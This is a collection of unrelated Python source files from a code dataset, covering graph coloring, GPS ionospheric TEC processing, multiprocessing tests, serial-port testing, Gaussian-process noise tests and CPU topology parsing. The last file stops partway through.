treeNumber[tree_] = nTrees
treeNumber[neigh] = nTrees
nTrees += 1
block += [coordinate]
#block = np.array(block)[:block_size**3]
block = np.array(block)
block.sort()
return block
class ForestBuilder:
def __init__(self, ind=None, A=None):
self.block = []
self.treeNumber = {}
self.nTrees = 0
if ind is not None:
self.add2forest(ind, A)
def checkForestProperty(self, ind, A):
neighbors = np.nonzero(A[ind])[0]
blockNeighs = np.intersect1d(neighbors, self.block)
neighTrees = set()
addNode = True
for neigh in blockNeighs:
if self.treeNumber[neigh] not in neighTrees:
neighTrees.add(self.treeNumber[neigh])
else:
addNode = False
break
return {"addNode":addNode, "blockNeighs":blockNeighs}
def add2forest(self, ind, A):
meta = self.checkForestProperty(ind, A)
if meta["addNode"] is False:
return False
blockNeighs = meta["blockNeighs"]
if blockNeighs.size == 0:
self.treeNumber[ind] = self.nTrees
self.nTrees += 1
else:
self.treeNumber[ind] = self.nTrees
for neigh in blockNeighs:
treeID = self.treeNumber[neigh]
for tree_ in self.treeNumber:
if self.treeNumber[tree_] == treeID:
self.treeNumber[tree_] = self.nTrees
self.treeNumber[neigh] = self.nTrees
self.nTrees += 1
self.block += [ind]
return True
#### GENERAL GRAPH
def get_tp_general_graph(W, L=None):
forestDict = {}
n_nodes = W.shape[0]
nodeIndices = np.arange(n_nodes)
if L is not None:
nodeIndices = np.argsort(L)[::-1]
for i in nodeIndices:
availForests = {}
for f in forestDict:
forest = forestDict[f]
if forest.checkForestProperty(i, W)["addNode"]:
availForests[f] = len(forest.block)
if len(availForests) == 0:
# Create new color
f = len(forestDict)
forestDict[f] = ForestBuilder(ind=i,A=W)
else:
# Use existing color
#f = min(availForests, key=availForests.get)
f = min(availForests.keys())
forestDict[f].add2forest(i, W)
# SANITY CHECK
alls = []
blocks = []
for f in forestDict:
blocks += [forestDict[f].block]
alls += forestDict[f].block
alls = np.array(alls)
assert np.unique(alls).size == alls.size
assert alls.size == n_nodes
#
return tuple([np.array(b) for b in blocks])
def isForest(Wb):
n = Wb.shape[0]
Laplacian = Wb.copy()
Laplacian[np.diag_indices(n)] = Wb.sum(1)
LHS = 0.5*np.trace(Laplacian)
RHS = np.linalg.matrix_rank(Laplacian)
return LHS == RHS
def get_rb_general_graph(W, L=None):
colorDict = {}
blockDict = {}
n_nodes = W.shape[0]
node2color = np.ones(n_nodes) * -1
nodeIndices = np.arange(n_nodes)
if L is not None:
nodeIndices = np.argsort(L)[::-1]
for i in nodeIndices:
neigh = np.where(W[i] != 0)[0]
# Get neighbor colors that are not -1
neighColors = np.unique(node2color[neigh])
palette = {c:colorDict[c] for c in colorDict if c not in neighColors}
if len(palette) == 0:
# Create new color
c = len(colorDict)
colorDict[c] = 1
blockDict[c] = [i]
node2color[i] = c
else:
# Use existing color
c = min(palette, key=palette.get)
colorDict[c] += 1
blockDict[c] += [i]
node2color[i] = c
# SANITY CHECK
alls = []
for v in blockDict.values():
alls += v
alls = np.array(alls)
assert np.unique(alls).size == alls.size
assert alls.size == n_nodes
#
return tuple([np.array(b) for b in blockDict.values()])
#### LATTICE GRAPH
def get_tp_indices(nrows, ncols):
white = [np.arange(0, ncols*nrows, nrows)]
black = [np.arange(nrows-1, ncols*nrows, nrows)]
for c in range(ncols):
if c % 2 == 0:
white += [np.arange(c*nrows, (c+1)*nrows-1)]
else:
black += [np.arange(c*nrows+1, (c+1)*nrows)]
white = np.unique(np.hstack(white))
black = np.unique(np.hstack(black))
assert black.size + white.size == (nrows * ncols)
assert np.array_equal(np.unique(np.hstack([black, white])), np.arange(nrows*ncols))
#return {"black":black, "white":white}
return (black, white)
def remove_labeled_nodes(graphBlocks, y):
labeled = np.where(y != 0)[0]
unlabeled = np.where(y == 0)[0]
gl2loc = {}
for gl, loc in zip(unlabeled, np.arange(unlabeled.shape[0])):
gl2loc[gl] = loc
new_graphBlocks = []
for block in graphBlocks:
new_block = np.setdiff1d(block, labeled)
new_block = np.array([gl2loc[b] for b in new_block])
#return {"black":black, "white":white}
new_graphBlocks += [new_block]
return tuple(new_graphBlocks)
def get_rb_indices(nrows, ncols):
red = []
black = []
for c in range(ncols):
odds = np.arange(1+c*nrows, (c+1)*nrows, 2)
evens = np.arange(0+c*nrows, (c+1)*nrows, 2)
if c % 2 == 0:
red += [evens]
black += [odds]
else:
red += [odds]
black += [evens]
red = np.hstack(red)
black = np.hstack(black)
assert black.size + red.size == (nrows * ncols)
assert np.array_equal(np.unique(np.hstack([black, red])), np.arange(nrows*ncols))
#return {"red":red, "black":black}
return (red, black)
|
StarcoderdataPython
|
3235283
|
<filename>gpstec/gpslos.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 20 12:06:16 2020
@author: <EMAIL>
"""
import numpy as np
import os
import h5py
from pyGnss import gnssUtils as gu
from pyGnss import scintillation
from datetime import datetime
import warnings
from argparse import ArgumentParser
warnings.simplefilter('ignore', np.RankWarning)
global tsps
def getIntervals(y, maxgap=3, maxjump=2):
r = np.arange(y.size)
idx = np.isfinite(y)
r = r[idx]
intervals=[]
if len(r)==0:
return idx, intervals
beginning=r[0]
last=r[0]
for i in r[1:]:
if (i-last > maxgap) or (abs(y[i] - y[last]) > maxjump):
intervals.append((beginning, last))
beginning=i
last=i
if i==r[-1]:
intervals.append((beginning, last))
return idx, intervals
def tecdPerLOS(stec, intervals, mask=None, eps=1, polynom_list=None, zero_mean=False):
global delta_eps, polynom_orders
tecd = np.nan * np.ones(stec.size)
if mask is None:
mask = np.zeros(stec.size, dtype=bool)
for ir, r in enumerate(intervals):
chunk = stec[r[0]+1 : r[1]-1]
idf = np.isfinite(chunk)
if np.sum(np.isfinite(chunk)) < (15 * (60/tsps)):
err_list = np.array([])
continue
if np.sum(np.isnan(chunk)) > 0:
chunk = gu.cubicSplineFit(chunk, idf)
res, err_list0, po = gu.detrend(chunk, polynom_list=polynom_list, eps=eps, mask=mask[r[0]+1 : r[1]-1], polynomial_order=True)
if ir == 0 or len(err_list) == 0:
err_list = err_list0
else:
err_list = np.vstack((err_list, err_list0))
res[~idf] = np.nan
if zero_mean:
if abs(np.nansum(res)) < 5:
tecd[r[0]+1 : r[1]-1] = res
else:
tecd[r[0]+1 : r[1]-1] = res
return tecd, err_list
def main(F, el_mask = None, odir = None):
global tsps
D = h5py.File(F, 'r')
el_mask = 30
maxjump = 1.6 + (np.sqrt(tsps) - 1)
eps = 1 * np.sqrt(30/tsps)
polynom_list = np.arange(0,20)
el_mask_in = (el_mask - 10) if (el_mask - 10) >= 8 else 8
print ('Reading in receiver names')
t0 = datetime.now()
rxn_all = np.asanyarray([row[12].decode() for row in D['Data/Table Layout'][()]])
rxn = np.unique(rxn_all)
print ('Read in {}.\nReading in satellite number'.format(datetime.now()-t0))
t0 = datetime.now()
sv_unique = np.unique(np.asanyarray([row[13] for row in D['Data/Table Layout'][()]]))
sv_index = np.arange(sv_unique.size)
sv_list = {}
for i, s in enumerate(sv_unique):
sv_list[str(s)] = sv_index[i]
print ('Read in {}.\nReading in observations times'.format(datetime.now()-t0))
obstimes = np.unique(np.asanyarray([datetime.utcfromtimestamp(row[9]) for row in D['Data/Table Layout'][()]]))
obstimes_unix = gu.datetime2posix(obstimes)
print ('Read in {}.\n'.format(datetime.now()-t0))
D.close()
# Out-filename
if odir is None:
odir = os.path.split(F)[0]
sfn = str(obstimes[0].year) + '_' + obstimes[0].strftime('%m%dT%H%M') + '-' + obstimes[-1].strftime('%m%dT%H%M') + '_' + 'madrigallos' + '_' + str(el_mask) +'el_' + str(tsps) + 's' + '_roti'
savefn = os.path.join(odir, sfn + '.h5')
# Duplicate file names
if os.path.exists(savefn):
head = os.path.splitext(savefn)[0]
c = 0
while os.path.exists(savefn):
try:
c = int(os.path.splitext(savefn)[0].split('_')[-1])
c += 1
except:
c += 1
savefn = head + '_' + str(c) + '.h5'
logfn = os.path.splitext(savefn)[0] + '.log'
LOG = open(logfn, 'w')
LOG.close()
print ('Init arrays')
TEC = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
DTEC = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
ROTI = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
AZ = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
EL = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
RXP = np.nan * np.zeros((rxn.size, 3), dtype=np.float16)
print ('Saving to: {}'.format(savefn))
h5file = h5py.File(savefn, 'w')
h5file.create_dataset('obstimes', data=obstimes_unix)
h5file.create_dataset('stec', data=TEC, compression='gzip', compression_opts=9)
h5file.create_dataset('res', data=DTEC, compression='gzip', compression_opts=9)
h5file.create_dataset('roti', data=ROTI, compression='gzip', compression_opts=9)
h5file.create_dataset('az', data=AZ, compression='gzip', compression_opts=9)
h5file.create_dataset('el', data=EL, compression='gzip', compression_opts=9)
h5file.create_dataset('rx_positions', data=RXP, compression='gzip', compression_opts=9)
asciiListN = [n.encode("ascii", "ignore") for n in rxn]
h5file.create_dataset('rx_name', (len(asciiListN),1),'S4', asciiListN)
h5file.close()
del TEC, DTEC, ROTI, AZ, EL, RXP
print ('Arrays erased')
for irx, rx in enumerate(rxn):
if irx == 0:
with open(logfn, 'a') as LOG:
LOG.write('Processing {}/{}.\n'.format(irx+1, rxn.size))
LOG.close()
else:
with open(logfn, 'a') as LOG:
LOG.write('Processing {}/{}. It took {} to process last RX data. \n'.format(irx+1, rxn.size, datetime.now()-t0))
LOG.close()
t0 = datetime.now()
try:
D = h5py.File(F, 'r')
idrx = np.isin(rxn_all, rx)
sv_all = np.asanyarray([row[13] for row in D['Data/Table Layout'][idrx]])
svn = np.unique(sv_all)
rx_lat = D['Data/Table Layout'][idrx][0][-4]
rx_lon = D['Data/Table Layout'][idrx][0][-3]
D.close()
h5file = h5py.File(savefn, 'a')
h5file['rx_positions'][irx, 0] = rx_lat
h5file['rx_positions'][irx, 1] = rx_lon
h5file['rx_positions'][irx, 2] = 0
h5file.close()
del rx_lat, rx_lon
for isv, sv in enumerate(svn):
vtec = np.nan * np.ones(obstimes.size, dtype=np.float16)
elv = np.nan * np.ones(obstimes.size, dtype=np.float16)
azm = np.nan * np.ones(obstimes.size, dtype=np.float16)
idsv = np.isin(sv_all, sv)
ids = sv_list[str(sv)]
D = h5py.File(F, 'r')
t = np.asanyarray([datetime.utcfromtimestamp(row[9]) for row in D['Data/Table Layout'][idrx][idsv] ])
idt = np.isin(obstimes, t)
vtec[idt] = np.asanyarray([row[18] for row in D['Data/Table Layout'][idrx][idsv] ])
elv[idt] = np.asanyarray([row[-5] for row in D['Data/Table Layout'][idrx][idsv] ])
azm[idt] = np.asanyarray([row[-6] for row in D['Data/Table Layout'][idrx][idsv] ])
D.close()
idel0 = np.nan_to_num(elv) < el_mask_in
idel = np.nan_to_num(elv) < el_mask
vtec[idel0] = np.nan
try:
idx, intervals = getIntervals(vtec, maxgap=5, maxjump=maxjump)
tecd, err_list = tecdPerLOS(vtec, intervals, polynom_list=polynom_list, eps=eps)
tecd[idel] = np.nan
rot = np.hstack((np.nan, (np.diff(vtec) / tsps)))
roti = scintillation.sigmaTEC(rot, 10) # 5 min
roti[idel] = np.nan
vtec[idel] = np.nan
h5file = h5py.File(savefn, 'a')
h5file['stec'][:, isv, irx] = vtec
h5file['roti'][:, isv, irx] = roti
h5file['res'][:, isv, irx] = tecd
h5file['el'][:, isv, irx] = elv
h5file['az'][:, isv, irx] = azm
h5file.close()
del vtec, tecd, elv, azm, roti, rot, idx, intervals, idel0, idel
except:
del vtec, elv, azm
del idrx, idsv, ids
except:
pass
with open(logfn, 'a') as LOG:
LOG.write('Processing Done')
LOG.close()
return 0
if __name__ == '__main__':
tsps = 30
p = ArgumentParser()
p.add_argument('filename', help= 'to madrigal_los.hdf5')
p.add_argument('--elmask', type = int, default = 30)
p.add_argument('--odir', help = 'Output directory.', default=None)
P = p.parse_args()
main(P.filename, el_mask=P.elmask, odir=P.odir)
|
StarcoderdataPython
|
3325483
|
<gh_stars>0
import numpy as np
import pytest
from lagom import Seeder
from lagom.core.multiprocessing import BaseWorker
from lagom.core.multiprocessing import BaseMaster
from lagom.core.multiprocessing import BaseIterativeMaster
def naive_primality(integer):
r"""Naive way to test a prime by iterating over all preceding integers. """
prime = True
if integer <= 1:
prime = False
else:
for i in range(2, integer):
if integer % i == 0:
prime = False
return prime
class NaivePrimalityWorker(BaseWorker):
def prepare(self):
self.prepared = 'ok'
def work(self, master_cmd):
assert self.prepared == 'ok'
task_id, task, seed = master_cmd
result = []
for integer in task:
result.append(naive_primality(integer=integer))
return task_id, result
class NaivePrimalityMaster(BaseMaster):
def make_tasks(self):
tasks = np.array_split(range(128*10), 128)
return tasks
def _process_workers_result(self, tasks, workers_result):
for task, worker_result in zip(tasks, workers_result):
task_id, result = worker_result
for integer, prime in zip(task, result):
assert prime == naive_primality(integer)
class NaivePrimalityIterativeMaster(BaseIterativeMaster):
def make_tasks(self, iteration):
tasks = np.array_split(range(128*10), self.num_worker)
return tasks
def _process_workers_result(self, tasks, workers_result):
for task, worker_result in zip(tasks, workers_result):
task_id, result = worker_result
for integer, prime in zip(task, result):
assert prime == naive_primality(integer)
class TestMultiprocessing(object):
def test_seeder(self):
seeder = Seeder(init_seed=0)
assert seeder.rng.get_state()[1][0] == 0
assert np.random.get_state()[1][20] != seeder.rng.get_state()[1][20]
assert len(seeder(size=1)) == 1
assert len(seeder(size=20)) == 20
assert np.array(seeder(size=[2, 3, 4])).shape == (2, 3, 4)
def test_master_worker(self):
prime_test = NaivePrimalityMaster(worker_class=NaivePrimalityWorker,
num_worker=128,
init_seed=0,
daemonic_worker=None)
prime_test()
def test_iterative_master_worker(self):
prime_test = NaivePrimalityIterativeMaster(num_iteration=3,
worker_class=NaivePrimalityWorker,
num_worker=128,
init_seed=0,
daemonic_worker=None)
prime_test()
|
StarcoderdataPython
|
154998
|
import logging
import synapse.lib.cache as s_cache
logger = logging.getLogger(__name__)
class Triggers:
def __init__(self):
self._trig_list = []
self._trig_match = s_cache.MatchCache()
self._trig_byname = s_cache.Cache(onmiss=self._onTrigNameMiss)
def clear(self):
'''
Clear all previously registered triggers
'''
self._trig_list = []
self._trig_byname.clear()
def add(self, func, perm):
'''
Add a new callback to the triggers.
Args:
func (function): The function to call
perm (str,dict): The permission tufo
Returns:
(None)
'''
self._trig_list.append((perm, func))
self._trig_byname.clear()
def _onTrigNameMiss(self, name):
retn = []
for perm, func in self._trig_list:
if self._trig_match.match(name, perm[0]):
retn.append((perm, func))
return retn
def _cmpperm(self, perm, must):
for prop, match in must[1].items():
valu = perm[1].get(prop)
if valu is None:
return False
if not self._trig_match.match(valu, match):
return False
return True
def trigger(self, perm, *args, **kwargs):
'''
Fire any matching trigger functions for the given perm.
Args:
perm ((str,dict)): The perm tufo to trigger
*args (list): args list to use calling the trigger function
**kwargs (dict): kwargs dict to use calling the trigger function
Returns:
(None)
'''
for must, func in self._trig_byname.get(perm[0]):
if self._cmpperm(perm, must):
try:
func(*args, **kwargs)
except Exception as e:
logger.exception(e)
|
StarcoderdataPython
|
123174
|
import glob
import random
training_rate = 0.9999
val_rate = 0.0001
def find_files(path, pattren="*.wav"):
filenames = []
for filename in glob.iglob(f'{path}/**/*{pattren}', recursive=True):
filenames.append(filename)
return filenames
def create_metadata(path="datasets"):
wav_lists = find_files(path=path)
random.shuffle(wav_lists)
train_num = int(len(wav_lists) * training_rate)
train_lists = wav_lists[:train_num]
val_lists = wav_lists[train_num:]
with open("datasets/training.txt", 'w', encoding='utf-8') as w1:
for i in train_lists:
w1.write(f"{i}\n")
with open("datasets/validation.txt", 'w', encoding='utf-8') as w2:
for i in val_lists:
w2.write(f"{i}\n")
if __name__ == '__main__':
create_metadata()
|
StarcoderdataPython
|
1718915
|
<reponame>JosephLutz/serialCommTest<filename>serialData.py<gh_stars>0
# serialData
from OrionPythonModules import serial_settings
from msgMonitor import CREATE_SERIAL_PORT
from msgMonitor import PORT_OPENED
from msgMonitor import PORT_CLOSED
from msgMonitor import REPORT_DATA_RECIEVED
import threading
import serial
import select
import termios
import Queue
import time
import sys
import os
if sys.hexversion < 0x020100f0:
import TERMIOS
else:
TERMIOS = termios
from config import *
class SerialData(serial.Serial):
#Used by the txThread and rxThread as the DataSendObj and dataGetObj.
LXM_MODE_VALUES = [
u'RS-232', u'RS-485 2-wire',
u'RS-485/422 4-wire', u'Loopback'
]
LXM_SERIAL_TYPES = {
u'RS232': LXM_MODE_VALUES[0],
u'RS485': LXM_MODE_VALUES[1],
u'RS422': LXM_MODE_VALUES[2],
None: LXM_MODE_VALUES[3],
}
def __init__(self, port, packetSource, msgQueue=None, readTimeout=SERIAL_PORT_READ_TIMEOUT, writeTimeout=None,
interCharTimeout=None):
serial.Serial.__init__(self,
port = None, #number of device, numbering starts at
#zero. if everything fails, the user
#can specify a device string, note
#that this isn't portable anymore
#port will be opened if one is specified
baudrate=115200, #baudrate
bytesize=serial.EIGHTBITS, #number of databits
parity=serial.PARITY_NONE, #enable parity checking
stopbits=serial.STOPBITS_ONE, #number of stopbits
timeout=readTimeout, #set a timeout value, None to wait forever
xonxoff=0, #enable software flow control
rtscts=0, #enable RTS/CTS flow control
writeTimeout=writeTimeout, #set a timeout for writes
dsrdtr=None, #None: use rtscts setting, dsrdtr override if true or false
interCharTimeout=interCharTimeout #Inter-character timeout, None to disable
)
if isinstance(port, str) or isinstance(port, unicode):
self.port = os.path.normpath(port)
else:
# Using an intiger is not as reliable (A guess is made).
self.port = port
# Queue for sending state back to messaging thread
self.msgQueue = msgQueue
# lock for when a thread needs exclusive access to the serial port
self.portLock = threading.Lock() # lock exclusive use of hardware
# list of sent packet information
self.sentPackets = [] #[(packetID, packetLength, hash), ...]
# place holder populated when the txThread is created
self.txThread = None
# data recieved (list of tuples, each containing data read and time since last read)
self.readBuffer = [] # [(data, time), ...]
# place holder populated when the rxThread is created
self.rxThread = None
# Queue that holds data packets to be sent
self.packetSource = packetSource
if self.msgQueue is not None:
self.msgQueue.put((None, {'port': self.port}, CREATE_SERIAL_PORT))
def set_serial_mode(self, mode=None):
def mode_in(mode):
if ((isinstance(mode, str) or isinstance(mode, unicode)) and
(unicode(mode.upper()) in SerialData.LXM_SERIAL_TYPES.keys())):
return SerialData.LXM_SERIAL_TYPES[mode]
elif ((isinstance(mode, str) or isinstance(mode, unicode)) and
(unicode(mode) in SerialData.LXM_SERIAL_TYPES.values())):
return unicode(mode)
elif isinstance(mode, int) and (mode >= 0) and (mode < len(SerialData.LXM_MODE_VALUES)):
return SerialData.LXM_MODE_VALUES[mode]
else:
return u'Loopback'
settings = serial_settings.SerialSettings()
settings.cards = [{
'type': '124',
'ports': [{}, {}, {}, {}, ]
}, {
'type': '124',
'ports': [{}, {}, {}, {}, ]
}]
if isinstance(mode, tuple) and len(mode) is 8:
for mode_index in range(0, 4):
settings.cards[0]['ports'][mode_index]['type'] = mode_in(mode[mode_index])
for mode_index in range(0, 4):
settings.cards[1]['ports'][mode_index]['type'] = mode_in(mode[mode_index])
elif isinstance(mode, str) or isinstance(mode, unicode) or isinstance(mode, int):
mode = mode_in(mode)
for mode_index in range(0, 4):
settings.cards[0]['ports'][mode_index]['type'] = mode
for mode_index in range(0, 4):
settings.cards[1]['ports'][mode_index]['type'] = mode
else:
mode = 'Loopback'
for mode_index in range(0, 4):
settings.cards[0]['ports'][mode_index]['type'] = mode
for mode_index in range(0, 4):
settings.cards[1]['ports'][mode_index]['type'] = mode
settings.apply()
def open_serial_port(self):
self.portLock.acquire()
if not self.isOpen():
if not os.path.exists(self.port):
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, None,
'Serial port {port} does not exist.'.format(port=self.port)))
self.portLock.release()
return False
try:
self.open()
except serial.SerialException:
if not os.path.exists(self.port):
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
('SerialException while opening port {port}, ' +
'and the port dissapeared after open atempt.'.format(port=self.port))))
else:
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'SerialException while opening port {port}.'.format(port=self.port)))
self.portLock.release()
return False
if not self.isOpen():
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'Serial port {port} would not open with specified port configuration.'.format(port=self.port)))
self.portLock.release()
return False
if ENABLE_RTS_LINE:
# NOTE: Set RTS back to False as soon as possible after open.
# open resets RTS True when RTS/CTS flow control disabled
# (re)set RTS to off
self.setRTS(False)
if ENABLE_DTR_LINE:
# set DTR to on
self.setDTR(True)
if ENABLE_TCDRAIN:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
iflag |= (TERMIOS.IGNBRK | TERMIOS.IGNPAR)
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, {'port': self.port}, PORT_OPENED))
self.portLock.release()
return True
def close_serial_port(self):
self.portLock.acquire()
if self.isOpen():
if ENABLE_RTS_LINE:
# set RTS to off
self.setRTS(False)
if ENABLE_DTR_LINE:
# set DTR to off
self.setDTR(False)
# close the port
self.close()
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, {'port': self.port}, PORT_CLOSED))
self.portLock.release()
#
# These methods determine how the port is used
#
def thread_send_startup(self):
self.sentPackets = []
# opent the port
if not self.open_serial_port():
raise BaseException
def thread_send_start(self):
if ENABLE_RTS_LINE:
self.portLock.acquire()
# set RTS to on
self.setRTS(True)
self.portLock.release()
time.sleep(SERIAL_PORT_WARMUP_TIME)
def send_data(self):
start_time = time.time()
if self.packetSource.queue.empty():
return False
# get the dataTuple from the Queue
dataTuple = None
try:
while dataTuple is None:
dataTuple = self.packetSource.queue.get_nowait()
except Queue.Empty:
return False
# notify we are using a packet
self.packetSource.packetUsed.set()
# write the data
try:
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'Started TX on {packetLength} byte packet {packetID} @ {time}'.format(
packetID=dataTuple[1], time=(time.time() - start_time), packetLength=dataTuple[2])))
self.write(dataTuple[0])
if self.msgQueue is not None:
self.msgQueue.put(self.txThread.threadID, None,
'Finished TX on {packetLength} byte packet {packetID} @ {time}'.format(
packetID=dataTuple[1], time=(time.time() - start_time), packetLength=dataTuple[2]))
except serial.SerialTimeoutException:
if self.msgQueue is not None:
self.msgQueue.put(self.txThread.threadID, None, 'SerialException durring packet write')
return False
# store tuple of packet info: (packetID, packetLength, hash)
self.sentPackets.append(dataTuple[1:])
return True
def thread_send_stop(self):
if (self.fd > 0):
if ENABLE_RTS_LINE:
self.portLock.acquire()
if ENABLE_TCDRAIN:
termios.tcdrain(self.fd)
time.sleep(SERIAL_PORT_COOLDOWN_TIME)
# set RTS to off
self.setRTS(False)
self.portLock.release()
# use the message queue to send self.sentPackets
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, self.sentPackets, REPORT_DATA_RECIEVED))
def thread_get_startup(self):
# reset the readBuffer
self.readBuffer = []
# open the port
if not self.open_serial_port():
raise BaseException
def thread_get_start(self):
pass
def get_data(self):
reading = True
bytes_read = 0
start_time = time.time()
while reading:
(rlist, _, _) = select.select([self.fileno()], [], [], self.timeout)
if (len(rlist) is 1) and rlist[0] is self.fileno():
data = self.read(NUM_BYTES_TO_READ)
bytes_read += len(data)
self.readBuffer.append((data, (time.time() - start_time)),)
else:
reading = False
if bytes_read is 0:
return False
return True
def thread_get_stop(self):
# send the readBuffer in the message queue
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, self.readBuffer, 'Data read before timeout.'))
if __name__ == '__main__':
import tests.serialData_test
tests.serialData_test.runtests
|
StarcoderdataPython
|
130012
|
# -*- coding: utf-8 -*-
# mypy: ignore-errors
import jax.numpy as jnp
import numpy as np
import tinygp
def check_noise_model(noise, dense_rep):
random = np.random.default_rng(6675)
np.testing.assert_allclose(noise.diagonal(), jnp.diag(dense_rep))
np.testing.assert_allclose(noise + np.zeros_like(dense_rep), dense_rep)
y1 = random.normal(size=dense_rep.shape)
np.testing.assert_allclose(noise + y1, dense_rep + y1)
np.testing.assert_allclose(y1 + noise, y1 + dense_rep)
np.testing.assert_allclose(noise @ y1, dense_rep @ y1)
y2 = random.normal(size=(dense_rep.shape[1], 3))
np.testing.assert_allclose(noise @ y2, dense_rep @ y2)
y3 = random.normal(size=dense_rep.shape[1])
np.testing.assert_allclose(noise @ y3, dense_rep @ y3)
try:
qsm = noise.to_qsm()
except NotImplementedError:
pass
else:
np.testing.assert_allclose(qsm @ y1, dense_rep @ y1)
np.testing.assert_allclose(qsm @ y2, dense_rep @ y2)
np.testing.assert_allclose(qsm @ y3, dense_rep @ y3)
def test_diagonal():
N = 50
random = np.random.default_rng(9432)
diag = random.normal(size=N)
noise = tinygp.noise.Diagonal(diag=diag)
check_noise_model(noise, np.diag(diag))
def test_banded():
N, J = 50, 5
random = np.random.default_rng(9432)
# Create a random symmetric banded matrix
R = random.normal(size=(N, N))
R[np.triu_indices(N, J + 1)] = 0
R[np.tril_indices(N)] = R.T[np.tril_indices(N)]
# Extract the diagonal and off-diagonal elements
diag = np.diag(R)
off_diags = np.zeros((N, J))
for j in range(J):
off_diags[: N - j - 1, j] = R[
(np.arange(0, N - j - 1), np.arange(j + 1, N))
]
noise = tinygp.noise.Banded(diag=diag, off_diags=off_diags)
check_noise_model(noise, R)
def test_dense():
N = 50
random = np.random.default_rng(9432)
M = random.normal(size=(N, N))
noise = tinygp.noise.Dense(value=M)
check_noise_model(noise, M)
|
StarcoderdataPython
|
1689819
|
from __future__ import print_function
import torch
import torch.nn as nn
class Normalization(nn.Module):
def __init__(self, mean, std):
super(Normalization, self).__init__()
self.mean = mean.clone().detach()
self.std = std.clone().detach()
def forward(self, img):
# normalize img
self.mean = torch.tensor(self.mean).view(-1, 1, 1)
self.std = torch.tensor(self.std).view(-1, 1, 1)
normalized_img = (img - self.mean) / self.std
return normalized_img
|
StarcoderdataPython
|
1759631
|
"""
curso Python 3 - Exercício Python #020
Um professor quer sortear a ordem de apresentaçao dos seus quatro alunos,
faça um programa que ajude ele, lendo o nome dos alunos e listando a ordem.
25.03.2021 - <NAME>
"""
from random import shuffle
a1 = str(input('Digite o nome do aluno 1 '))
a2 = str(input('Digite o nome do aluno 2 '))
a3 = str(input('Digite o nome do aluno 3 '))
a4 = str(input('Digite o nome do aluno 4 '))
lista = [a1, a2, a3, a4]
shuffle(lista)
print(f'A ordem da apresentação é {lista}')
|
StarcoderdataPython
|
187453
|
<reponame>ConnorDoyle/CPU-Manager-for-Kubernetes
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import proc
from collections import OrderedDict
import json
import logging
import os
import subprocess
ENV_LSCPU_SYSFS = "CMK_DEV_LSCPU_SYSFS"
# Returns a dictionary of socket_id (int) to intel.topology.Socket.
def discover():
isol = isolcpus()
if isol:
logging.info("Isolated logical cores: {}".format(
",".join([str(c) for c in isol])))
return parse(lscpu(), isol)
class Socket:
def __init__(self, socket_id, cores=None):
if not cores:
cores = {}
self.socket_id = socket_id
self.cores = OrderedDict(
sorted(cores.items(), key=lambda pair: pair[1].core_id))
def as_dict(self, include_pool=True):
return {
"id": self.socket_id,
"cores": [c.as_dict(include_pool) for c in self.cores.values()]
}
def json(self):
return json.dumps(self.as_dict(), indent=2, sort_keys=True)
class Core:
def __init__(self, core_id, cpus=None):
if not cpus:
cpus = {}
self.core_id = core_id
self.pool = None
self.cpus = OrderedDict(
sorted(cpus.items(), key=lambda pair: pair[1].cpu_id))
def cpu_ids(self):
return list(self.cpus.keys())
def is_isolated(self):
if len(self.cpus) == 0:
return False
for cpu_id in self.cpus:
if not self.cpus[cpu_id].isolated:
return False
return True
def as_dict(self, include_pool=True):
result = {
"id": self.core_id,
"cpus": [c.as_dict() for c in self.cpus.values()]
}
if include_pool:
result["pool"] = self.pool
return result
class CPU:
def __init__(self, cpu_id):
self.cpu_id = cpu_id
self.isolated = False
def as_dict(self):
return {
"id": self.cpu_id,
"isolated": self.isolated,
}
# Returns of map of socket id (integer) to sockets (Socket type).
# lscpu has the following format:
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # CPU,Core,Socket,Node,,L1d,L1i,L2,L3
# 0,0,0,0,,0,0,0,0
# 1,1,0,0,,1,1,1,0
def parse(lscpu_output, isolated_cpus=None):
if not isolated_cpus:
isolated_cpus = []
sockets = {}
for line in lscpu_output.split("\n"):
if line and not line.startswith("#"):
cpuinfo = line.split(",")
socket_id = int(cpuinfo[2])
core_id = int(cpuinfo[1])
cpu_id = int(cpuinfo[0])
if socket_id not in sockets:
sockets[socket_id] = Socket(socket_id)
socket = sockets[socket_id]
if core_id not in socket.cores:
socket.cores[core_id] = Core(core_id)
core = socket.cores[core_id]
cpu = CPU(cpu_id)
if cpu.cpu_id in isolated_cpus:
cpu.isolated = True
core.cpus[cpu_id] = cpu
return sockets
def lscpu():
sys_fs_path = os.getenv(ENV_LSCPU_SYSFS)
if sys_fs_path is None:
cmd_out = subprocess.check_output("lscpu -p", shell=True)
else:
cmd_out = subprocess.check_output(
"lscpu -p -s %s" % sys_fs_path, shell=True)
return cmd_out.decode("UTF-8")
def isolcpus():
